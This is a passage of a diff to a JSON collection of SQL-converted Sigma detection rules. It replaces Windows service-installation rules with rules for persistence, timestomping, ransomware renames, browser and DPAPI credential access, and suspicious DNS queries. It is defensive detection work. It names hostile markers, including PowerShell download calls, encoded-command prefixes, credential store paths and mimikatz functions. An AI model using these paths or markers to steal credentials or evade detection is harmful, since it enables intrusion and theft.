* FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Persistence Via Notepad++ Plugins", + "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' 
ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\target.exe' ESCAPE '\\' OR Image LIKE '%Installer.x64.exe' ESCAPE '\\'))))" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_notepad_plus_plus_persistence.yml" }, { - "title": "Tap Driver Installation", - "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "status": "experimental", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_tap_driver_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Rename Common File to DLL File", + "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "author": "frack113", "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Application installation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE 
'%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_rename_win_not_dll_to_dll.yml" }, { - "title": "Mesh Agent Service Installation", - "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "title": "Suspicious Appended Extension", + "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "status": "experimental", - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate use of the tool" + "Backup software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' 
ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" ], - "filename": "win_system_service_install_mesh_agent.yml" + "filename": "file_rename_win_ransomware.yml" }, { - "title": "Exploit SamAccountName Spoofing with Kerberos", - "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "status": "test", - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "author": "frack113", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "status": "experimental", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 
'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38')) OR (Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' 
OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Access To Browser Credential Files", + "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Legitimate software installed on partitions other than \"C:\\\"", + "Searching software 
such as \"everything.exe\"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR (FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\') OR (FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\')) AND NOT ((Image = 'System' AND ParentImage = 'Idle') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')))) AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "file_access_win_browser_credential_stealing.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", - "status": "test", - "description": "Detects service installation with suspicious folder 
patterns", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Access To Windows DPAPI Master Keys", + "id": "46612ae6-86be-4802-bc07-39b59feb1309", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "file_access_win_dpapi_master_key_access.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "title": "Credential Manager Access", + "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and 
vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "file_access_win_credential_manager_stealing.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", - "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be 
loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "title": "Suspicious Access To Windows Credential History File", + "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "file_access_win_susp_cred_hist_access.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "AppX Package Installation Attempts Via AppInstaller", + "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "status": "test", + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. 
It attempts to load/install a package from the referenced URL", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND Image LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_lolbin_appinstaller.yml" }, { - "title": "Service Installation in Suspicious Folder", - "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "status": "experimental", - "description": "Detects service installation in suspicious folder appdata", - "author": "pH-T (Nextron Systems)", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) 
AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "PAExec Service Installation", - "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "status": "experimental", - "description": "Detects PAExec service installation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "win_system_service_install_paexec.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": 
"Florian Roth (Nextron Systems)", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' 